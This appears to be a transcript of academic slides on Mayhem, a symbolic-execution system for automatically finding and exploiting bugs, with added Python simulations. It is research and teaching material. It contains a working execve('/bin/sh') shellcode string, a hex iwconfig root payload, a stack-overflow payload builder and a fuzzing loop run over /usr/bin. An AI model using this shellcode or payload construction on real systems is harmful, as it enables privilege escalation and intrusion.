Checking the World’s Software for Exploitable Bugs

David Brumley Carnegie Mellon University Stand up straight. PPW

An epic battle: White vs. Black
[Figure: White and Black facing off; command shown: format c:]
First sentence: I love computer security. I love that it’s an epic battle of white vs. black, us vs. them, good vs. evil. It’s the only area of computer science that brings alive the notion of an adversary. In security, adversaries really exist.

Exploit bugs
[Figure: White, Black, and a bug; command shown: format c:]

OK:      $ iwconfig accesspoint
Exploit: $ iwconfig [payload shown as hex: 01ad fce8 bfff c0 2f68 732f f 6e69 e e189 d231 0bb0 80cd]
         # (Superuser)

Bug Fixed!
[Figure: White and Black; command shown: format c:]

Fact: Ubuntu Linux has over 99,000 known bugs

1009 Linux programs. 13 minutes. 52 new bugs in 29 programs.
inp=`perl -e '{print "A"x8000}'`
for program in /usr/bin/*; do
  for opt in {a..z} {A..Z}; do
    timeout -s 9 1s $program -$opt $inp
  done
done

Which bugs are exploitable?
Evil David

Plaid Parliament of Pwning CMU Hacking Team

DEF CON 2012 scoreboard
[Figure: scoreboard plot; labels: CMU, Time (3 days total)]

A Manual Process

DEF CON 2013

I skate to where the puck is going to be, not where it has been.
--- Wayne Gretzky Hockey Hall of Fame

Our Vision: Automatically Check the World’s Software for Exploitable Bugs

We owned the machine in seconds
Evil David

Verification, but with a twist
Program + Correctness Property -> Verification -> Correct / Incorrect
Program + Un-exploitability Property -> Verification -> Safe paths / Exploit
33,248 programs, 152 new exploitable bugs

Outline
- Basic exploitation
- Symbolic execution for exploit generation
- Automatic exploit generation on real code
- Experiments
- Related projects and the future

Control flow hijack: attacker gains control of execution
- buffer overflow
- format string attack
- heap metadata overwrite
- use-after-free
- ...
Same principle, different mechanism

Basic execution semantics of compiled code
Process memory holds code, data, heap, and stack; the processor reads and writes it.
The instruction pointer (EIP) points to the next instruction to execute.
The processor starts with code in memory and repeats: fetch, decode, execute.
Control flow hijack: EIP = attacker code

Buffer overflows and the runtime stack
int vulnerable(char *input) {
    char buf[32];
    int x;
    if (...) {
        x = 1;
    } else {
        x = 0;
    }
    strcpy(buf, input);   /* no bounds check on buf */
    return x;
}
What matters here: execution semantics, including call/return and local variables.
Control flow hijack happens when input length > buffer length.
Speaker note: go over the program.

locals allocated on stack
vulnerable’s initial stack frame (higher addresses first):
  ...
  char *input
  saved eip
  caller’s ebp
  32 bytes for buf
  int x
  char *buf
  (lower addresses)
int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }

input = “ABC\0”: writes go up!
Stack (higher addresses first):
  ...
  char *input
  saved eip
  caller’s ebp
  32 bytes for buf   <- ABC\0 is written here; writes proceed toward higher addresses
  int x
  char *buf
  (lower addresses)
int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }

“return address”
caller() {
  i:   vulnerable(input);
  i+1: ...
}
Stack while vulnerable runs (higher addresses first):
  char *input
  saved eip          <- the return address: where caller resumes at i+1
  caller’s ebp
  32 bytes for buf   (holds ABC\0)
  int x
  char *buf
  (lower addresses)
int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }
On return, the processor loads the saved eip into EIP.

Traditionally we show exploitability by running shellcode
A buffer overflow occurs when data is written outside of the space allocated for the buffer. C does not check that writes are in bounds.
Stack (higher addresses first): ..., char *input, saved eip, caller’s ebp, 32 bytes for buf, int x, char *buf. Writes to buf move toward saved eip.
Classic exploit: overwrite saved EIP. The key here is predetermined allocation.
* More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research.

Shellcode is a string
execve("/bin/sh", 0, 0); -> Compile -> Executable String:
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
Author: kernel_panik,

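input = shellcode . address of buf
Stack after strcpy (higher addresses first):
  ...
  char *input
  saved eip          <- overwritten with &buf
  caller’s ebp       <- overwritten
  32 bytes for buf   <- \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f ...
  int x
  char *buf
int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }
Processor EIP: about to be loaded from saved eip, which now holds &buf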

Owned!
input = shellcode . address of buf
Stack (higher addresses first):
  ...
  char *input
  saved eip          <- &buf
  caller’s ebp
  32 bytes for buf   <- \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f ...
  int x
  char *buf
int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }
On return, %eip = &buf, so %eip = <shellcode> and the processor runs execve("/bin/sh", NULL).
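The overwrite walked through on these slides can be replayed safely as a simulation. The sketch below is in Python rather than the C of the slides, and it models the stack frame as a byte array instead of touching real memory; nothing is executed. The 4-byte saved ebp and saved eip, the offsets, the "legitimate" return address, and BUF_ADDR are assumptions for a 32-bit x86 frame, and strcpy_sim is a hypothetical helper.

```python
import struct

# Assumed 32-bit frame layout, counted from the start of buf (lowest address).
BUF_SIZE = 32                          # char buf[32]
SAVED_EBP_OFF = BUF_SIZE               # caller's ebp sits right above buf
SAVED_EIP_OFF = BUF_SIZE + 4           # saved eip sits above caller's ebp
FRAME_SIZE = SAVED_EIP_OFF + 4 + 4     # plus the char *input argument slot

BUF_ADDR = 0xBFFFF6C0                  # hypothetical address of buf (no zero bytes)
LEGIT_RETURN = 0x08048456              # hypothetical return address into caller

# The 21-byte shellcode string from the slide; it contains no NUL byte.
SHELLCODE = bytes.fromhex("31c9f7e151682f2f7368682f62696e89e3b00bcd80")


def strcpy_sim(frame, src):
    """Copy src into the frame starting at buf, up to and including the
    first NUL byte, with no bounds check on buf (like strcpy)."""
    i = 0
    while True:
        frame[i] = src[i]
        if src[i] == 0:
            return
        i += 1


def build_payload():
    """input = shellcode . padding . address of buf (little-endian)."""
    padding = b"A" * (SAVED_EIP_OFF - len(SHELLCODE))
    return SHELLCODE + padding + struct.pack("<I", BUF_ADDR) + b"\x00"


def saved_eip(frame):
    return struct.unpack_from("<I", frame, SAVED_EIP_OFF)[0]


frame = bytearray(FRAME_SIZE)
struct.pack_into("<I", frame, SAVED_EIP_OFF, LEGIT_RETURN)

strcpy_sim(frame, b"ABC\x00")          # short input: saved eip untouched
benign_eip = saved_eip(frame)

strcpy_sim(frame, build_payload())     # long input: saved eip now holds &buf
hijacked_eip = saved_eip(frame)

print(hex(benign_eip), hex(hijacked_eip))
```

The padding exists only to reach the saved eip slot; on a real target the distance and the address of buf would have to be discovered, which is the part the rest of the talk automates.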

Automatically finding exploitable bugs

Verification, but with a twist
Program + Correctness Property -> Verification -> Correct / Incorrect
Program + Un-exploitability Property -> Verification -> Safe path / Exploitable
We use symbolic execution to test paths [Boyer75, Howden75, King76]

Basic symbolic execution
Symbolic execution runs on symbolic input.
x = input()              x can be anything
if x > 42                true branch: x > 42
  if x*x = MAXINT        false branch: (x > 42) ∧ (x*x != MAXINT)
    if x < 42            false branch: (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42)
      jmp stack[x]       (true branch)

Path formula (true for inputs that take path)
A path formula is true exactly for the inputs that take that path.
Program: x = input(); if x > 42; if x*x = MAXINT; if x < 42; jmp stack[x]
Formulas along one path:
  x can be anything
  x > 42
  (x > 42) ∧ (x*x != MAXINT)
  (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42)
Symbolic execution runs on symbolic input.

Path formula: (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42)
Satisfiability Modulo Theory (SMT) solver: Satisfiable (x = 43). That is a test case for this path!
Program: x = input(); if x > 42; if x*x = MAXINT; if x < 42; jmp stack[x]
Symbolic execution runs on symbolic input.

Path formula: (x > 42) ∧ (x*x != MAXINT) ∧ (x <= 42)
SMT solver: UNSAT (infeasible path)
Program: x = input(); if x > 42; if x*x = MAXINT; if x < 42; jmp stack[x]
Symbolic execution runs on symbolic input.
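The two solver outcomes on these slides can be reproduced with a toy stand-in for the SMT solver. The sketch below is Python and simply enumerates a small range of candidate values; the function solve, the search domain, and the 32-bit wraparound for x*x are assumptions, and a real tool would hand the formula to an SMT solver instead. A result of None only means no witness exists in the searched range.

```python
MAXINT = 0xFFFFFFFF  # assumed 32-bit MAXINT, as in the later 0xffffffff query


def solve(constraints, domain=range(0, 1024)):
    """Brute-force stand-in for an SMT solver: return the first value in
    domain that satisfies every constraint, or None if there is none."""
    for x in domain:
        if all(check(x) for check in constraints):
            return x
    return None


# (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42)
path_feasible = [
    lambda x: x > 42,
    lambda x: (x * x) & MAXINT != MAXINT,
    lambda x: not (x < 42),
]

# (x > 42) ∧ (x*x != MAXINT) ∧ (x <= 42)
path_infeasible = [
    lambda x: x > 42,
    lambda x: (x * x) & MAXINT != MAXINT,
    lambda x: x <= 42,
]

witness = solve(path_feasible)        # a concrete test case for the path
no_witness = solve(path_infeasible)   # contradictory constraints

print(witness, no_witness)
```

The first formula yields x = 43, matching the slide; the second has no solution because x > 42 and x <= 42 contradict each other.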

Checking non-exploitability
Un-exploitability property: EIP != user input
Program: x = input(); if x > 42; if x*x = MAXINT; if x < 42; jmp stack[x]
Query for one path: (x > 42) ∧ (x*x == MAXINT) ∧ Un-exploitable

Checking non-exploitability
For each path, ask the SMT solver: <path formula> ∧ eip != user input
SAT (safe); UNSAT (exploit)
Stack (higher addresses first): ..., char *input, saved eip, caller’s ebp, 32 bytes for buf
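A per-path check of the property "eip != user input" can be sketched for the running strcpy example. The Python below treats each input length as one path and tracks where every byte of the frame came from, instead of building a solver query; the offsets (32 bytes for buf, 4 for caller's ebp, 4 for saved eip) and all function names are assumptions, and the sketch flags only paths where every byte of saved eip is attacker-chosen.

```python
BUF_SIZE = 32
SAVED_EIP = range(36, 40)   # assumed offsets of saved eip, counted from buf
FRAME_SIZE = 44             # buf + caller's ebp + saved eip + char *input


def frame_after_strcpy(n):
    """Provenance of each frame byte after strcpy copies an input with
    n non-NUL bytes: ("input", i), "nul" for the terminator, or "orig"."""
    frame = ["orig"] * FRAME_SIZE
    for i in range(n):
        frame[i] = ("input", i)
    frame[n] = "nul"
    return frame


def eip_is_user_input(n):
    """True if every byte of saved eip comes from the attacker's input."""
    frame = frame_after_strcpy(n)
    return all(isinstance(frame[off], tuple) for off in SAVED_EIP)


# One path per input length; keep the ones that violate the property.
exploitable_lengths = [n for n in range(FRAME_SIZE) if eip_is_user_input(n)]

print(exploitable_lengths[0])
```

Under these assumptions the shortest violating input has 40 non-NUL bytes, which lines up with the "40 bytes, all non-NULL" condition that appears later in the talk.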

Exploit generation can be cast as a verification problem.

Real world exploit generation a brief history
Ours and others:
2005 (others): Automatic Discovery of API-Level Exploits [Ganapathy et al., Conference on Software Engineering]
2008 (ours): Automatic Patch-Based Exploit Generation [Brumley et al., IEEE Security and Privacy Symposium]
2010 (others): Automatic Generation of Control Flow Hijack Exploits for Commodity Software [Heelan, MS Thesis]
2011 (ours): Automatic Exploit Generation [Avgerinos et al., Network and Distributed System Security Symposium]
2011 (ours): Q: Exploit Hardening Made Easy [Schwartz et al., USENIX Security Symposium]
2012 (ours): Unleashing Mayhem on Binary Code [Cha et al., IEEE Security and Privacy Symposium]
And >150 papers on symbolic execution

Exploiting Real Code: The Mayhem Architecture
Principles:
- Require only the binary (e.g., BAP, our binary analysis platform)
- Use intelligent analysis to reduce state space (e.g., preconditioned symbolic execution)
- Make queries to SMT as easy as possible (e.g., symbolic memories)

Potentially infinite state space
strcpy(buf, input); behaves like:
  while (input[i] != 0) { buf[i] = input[i]; i++; }
  buf[i] = 0;
Every loop iteration is a branch on symbolic input:
  if (input[0] != 0)  t / f
  if (input[1] != 0)  t / f
  …
  if (input[n] != 0)  t / f

check every branch blindly
  if (input[0] != 0): 20 min exploration
  if (input[1] != 0): 30 min exploration
  …
  if (input[n] != 0): x min exploration
  then: exploitable bug found
KLEE [Cadar’08] does this

Preconditioned symbolic execution
[Figure: sets labeled All Inputs, Trigger bug, Control Hijack]
Preconditions focus search, e.g.: input > len
Other examples in [Avgerinos11]
Note: input vs bugs doesn’t typecheck

Static and online analysis determines likely exploit conditions
Likely exploit condition: 40 bytes, all non-NULL
Stack (higher addresses first): ..., char *input, saved eip, caller’s ebp, 32 bytes for buf
Code: char buf[32]; int x; ... strcpy(buf, input);

Example: length precondition
if (input[0] != 0), false branch: precondition check length(input) > 40 ∧ input[0] == 0 is unsatisfiable. Not explored. Saved 20 min.
if (input[1] != 0), false branch: precondition check length(input) > 40 ∧ input[1] == 0 is unsatisfiable. Not explored. Saved 30 min.
…
if (input[n] != 0), false branch: not explored. Saved x min.
Exploitable bug found
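The pruning effect of the length precondition can be sketched by enumerating the exit paths of the strcpy loop and discarding those that contradict the precondition. The Python below is only an illustration: constraints are modeled as a map from byte index to "zero" or "nonzero", MAX_LEN is a hypothetical bound on input length, and the consistency check stands in for the solver call on the slide.

```python
MIN_LEN = 40    # precondition from the slide: length(input) > 40
MAX_LEN = 64    # hypothetical upper bound on the symbolic input length


def path_constraints(i):
    """Path leaving the strcpy loop at index i:
    input[0..i-1] != 0 and input[i] == 0."""
    constraints = {j: "nonzero" for j in range(i)}
    constraints[i] = "zero"
    return constraints


def precondition():
    """length(input) > MIN_LEN means bytes 0..MIN_LEN are all non-zero."""
    return {j: "nonzero" for j in range(MIN_LEN + 1)}


def consistent(a, b):
    """Two constraint sets conflict if they disagree on any shared byte."""
    return all(b.get(j, kind) == kind for j, kind in a.items())


blind_paths = list(range(MAX_LEN + 1))   # what blind exploration would visit
pre = precondition()
explored = [i for i in blind_paths if consistent(path_constraints(i), pre)]
pruned = len(blind_paths) - len(explored)

print(explored[0], pruned)
```

Every path that would terminate the copy within the first 41 bytes is rejected before any exploration time is spent on it, which is the saving the slide tallies in minutes.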

Don’t treat as a black box!
Query: (x > 42) ∧ (x*x != 0xffffffff) ∧ !(x < 42) -> SMT Solver -> SAT. (x = 43)
“Program” the SMT solver.
Symbolic execution runs on symbolic input

Symbolic memory indices
x := user_input();     (x can be anything)
<executed path>
y := mem[x];
assert(y = 42);
vulnerable();
Which memory cell contains 42? 2^32 cells to check (memory indices 0 to 2^32 - 1).
There are more causes…

Symbolic addresses occur often
c = get_char(); ... to_lower(c);
to_lower(char c) { return c >= -128 && c < 256 ? tbl[c] : c; }
[Figure: lookup table with entries ... a b c d ..., indexed from tbl+’A’] The address is symbolic.
Other causes:
- Parsing: sscanf, vfprintf, etc.
- Character test: isspace, isalpha, etc.
- Conversion: toupper, tolower, mbtowc, etc.
- …

Concretization: test case generation
e.g., SAGE, DART, CUTE, KLEE
✓ Solvable ✗ Exploits
x := user_input();
<executed path>
y := mem[30];          (index concretized to 30)
assert(y = 42);
vulnerable();
1 cell to check (cell 30 out of memory indices 0 to 2^32 - 1).
Misses over 40% of exploits
There are more causes…

Observation Path formula constrains range of symbolic memory accesses
x can be anything; after branches x > 0 (true) and x < 5 (true): 0 < x < 5
y = mem[x]; assert(y==42)
Use symbolic execution state to:
Step 1: Bound memory addresses referenced
Step 2: Reduce to linear formulas

piecewise linear equations
We know: 0 < x < 5 and y = mem[x]
[Figure: table and plot of memory value against index; values shown: 10, 12, 22, 20; fitted lines: y = 2*x + 10 and y = -2*x + 28]
40% more exploits (strength reduction)
See paper for details
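One way to picture the reduction to piecewise linear equations is a greedy pass over the bounded index range that groups consecutive cells lying on a common line. The Python below is a sketch under assumptions, not Mayhem's algorithm: the memory contents are hypothetical values chosen to agree with the two line equations on the slide, and linear_segments and lookup are illustrative names.

```python
def linear_segments(mem, lo, hi):
    """Greedily split mem[lo..hi] into maximal runs that lie on one line.
    Returns tuples (first_index, last_index, slope, intercept)."""
    segments = []
    start = lo
    while start <= hi:
        end = start
        slope = 0
        if start < hi:
            slope = mem[start + 1] - mem[start]
            end = start + 1
            # Extend the run while the next cell continues the same line.
            while end < hi and mem[end + 1] - mem[end] == slope:
                end += 1
        intercept = mem[start] - slope * start
        segments.append((start, end, slope, intercept))
        start = end + 1
    return segments


def lookup(segments, x):
    """Evaluate y = mem[x] using only the linear pieces."""
    for first, last, slope, intercept in segments:
        if first <= x <= last:
            return slope * x + intercept
    raise IndexError(x)


# Hypothetical memory contents for the bounded range 0 < x < 5.
mem = {1: 12, 2: 14, 3: 22, 4: 20}
segments = linear_segments(mem, 1, 4)

print(segments)
```

With these values the table collapses to two pieces, y = 2*x + 10 on indices 1..2 and y = -2*x + 28 on indices 3..4, so a solver can reason about two linear constraints instead of one case per memory cell.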

Experiments with Mayhem
- Known exploitable bugs
- Coverage for 997 programs
- Checking Debian

2 Unknown Bugs: FreeRadius, GnuGol
[Figure: results for known exploitable bugs on Linux and Windows] [Cha et al, NDSS’12]

coverage 50% Unchecked 50% on average tested
Code coverage measures the percentage of statements executed at least once by the symbolic executor.
Mayhem coverage was measured on 997 programs from /usr/bin and /bin, compiled with gcov.
On average: 50% tested, 50% unchecked

gcov coverage per program
[Figure: gcov coverage per program; x-axis: Programs]

Unique code lines covered
total unique lines (all programs): 2,245,632
lines covered (all programs): 437,455
absolute coverage: 19.48%
Achieving 100% is impossible due to dead code and other factors!

Checking Debian
33,248 programs
2,727 days CPU time
15,914,407,892 SMT queries
199,685,594 test cases
2,365,154 crashes
11,690 unique bugs
152 new exploits
28 cents a bug, 21 dollars an exploit

public data

mining data
Q: How long do queries take on average? A: 3.67ms on average with 0.34 variance
Q: Should I optimize hard or easy formulae? A: 99.99% take less than 1 second and account for 78% of total time
Q: Do queries get harder? A: Good question...
optimize fast queries
> basicStat()   [most output values are not preserved in this transcript]
Q. How many programs do you have? #program: 957
Q. How many SMT formulae have you queried and solved (within timeout)? #query
Q. Among those, how many are SAT? UNSAT? #sat, #unsat
Q. How many programs yield *fresh* formulae that take at least 1 second to solve? 563
Q. How many *distinct* SMT formulae take at least 1 second to solve? #formula: 18663
Q. What are the basic statistics on the TIME it took to solve these formulae? (sum, max, avg, var; each for both, sat, unsat)
Q. What are the basic statistics on the number of VARIABLES in these formulae? (max, avg, var; each for both, sat, unsat)
Q. What are the basic statistics on the number of CLAUSES in these formulae? (max, avg, var; each for both, sat, unsat)
Q. What are the basic statistics on the number of AST Nodes in these formulae? (max, avg, var; each for both, sat, unsat)
Q. What are the basic statistics on the DEPTH of exploration when generating these formulae? (max, avg, var; each for both, sat, unsat)

No dominant upward trend in time to solve (500 sec timeout)

Size not strongly correlated with hardness
SAT UNSAT

hardness is (likely) localized
[Figure: symbolic execution thread through Depth 0 (pointer resolution), Depth 1, Depth 2; one hard query marked]

Only 39 programs create hard formulas
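Example: for unsigned 32-bit a, a/10 is replaced with (a*0xcccccccd) >> 3, where the shift applies to the high 32 bits of the 64-bit product.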
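The rewrite on this slide is the usual multiply-and-shift replacement for unsigned division by a constant. The Python sketch below checks the identity on a handful of 32-bit values; div10, MAGIC, and the sample list are illustrative names, and the reading that such multiplications are what make a formula hard for the solver is an interpretation of the slide rather than something it states.

```python
MAGIC = 0xCCCCCCCD   # ceil(2**35 / 10)


def div10(a):
    """Unsigned 32-bit a // 10 computed with one multiply and shifts."""
    if not 0 <= a < 2**32:
        raise ValueError("a must fit in an unsigned 32-bit integer")
    high = (a * MAGIC) >> 32   # high 32 bits of the 64-bit product
    return high >> 3           # the ">> 3" from the slide


samples = [0, 1, 9, 10, 11, 99, 100, 12345, 2**31, 2**32 - 1]
mismatches = [a for a in samples if div10(a) != a // 10]

print(mismatches)
```

The two shifts together divide the product by 2^35, and because MAGIC is within 1/5 of 2^35/10 the rounding error stays too small to change the quotient for any 32-bit input.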

We are not perfect
- We don’t claim to find all exploitable bugs
- “Exploitability” vs. “safe” holds only with respect to a fixed input size
- Better symbolic execution
- <and many more reasons...>
But each report is actionable.

symbolic execution thrusts
1. Formalize Exploit: control flow hijack, information leaks, command injection
2. Binary Program Verification: path merging, faster SMT
3. Real Code: handle messy details, transactional rollback

the larger pipeline
Check OS Distribution
Program Analysis: symbolic execution, static analysis, fuzzing
Triage: unpatched code clones, scheduling
Tools: BAP [Brumley11], Decompiler [Schwartz13]
Mayhem: 11,690 bugs, 152 exploits [Cha11,Avgerinos12]
Unpatched code clones (redebug): 15,546 vulns [Jang12]
Scheduling: weighted coupon bug collecting with randomized MAB algs., 1.55x more bugs [Woo13]
2 year total: 27,659 bugs (423 from fuzzing + 15,546 from redebug + 11,690 from mayhem), 15,698 vulns

we’re not even close to done
- Refinement-Based Component Analysis for Binary Code (DARPA, with Engler)
- Breaking the Satisfiability Barrier (NSF, with Tinelli and Barrett)
- High School Hacking Competition
And others:
- SMT Hardness (w/ Williams)
- Exploiting multi-core for behavior-based detection and repair (NSF, w/ Mutlu, Mowry)
- Vetting commodity systems (DARPA, w/ Gligor, Jaeger)
- ....

It seems wrong to not try.
Our Vision: Automatically Check the World’s Software for Exploitable Bugs

Thank You! Questions?
Credits
Postdocs: Manuel Egele, Maverick Woo
PhD Students: Thanassis Avgerinos, Tiffany Bao, Sang Kil Cha, Peter Chapman, Samantha Gottlieb, Jiyong Jang, Matt Maurer, Alex Rebert, Ed Schwartz, Jonathan Burket
Undergrads: David Kohlbrenner, Tyler Nighswander, Brian Pak
Collaborators: Robert Brumley, Jonathan Diamond, Brent Ledvina
Special Thanks: Coherent Navigation, Mike Carns, Pete Kind, Barbara McNamara
Funding: Core Security, DARPA, Google, Lockheed Martin, Northrop Grumman, NSA, NSF, SEI, ODNI, Symantec, Microsoft, Wiley, Pearson, Amazon AWS
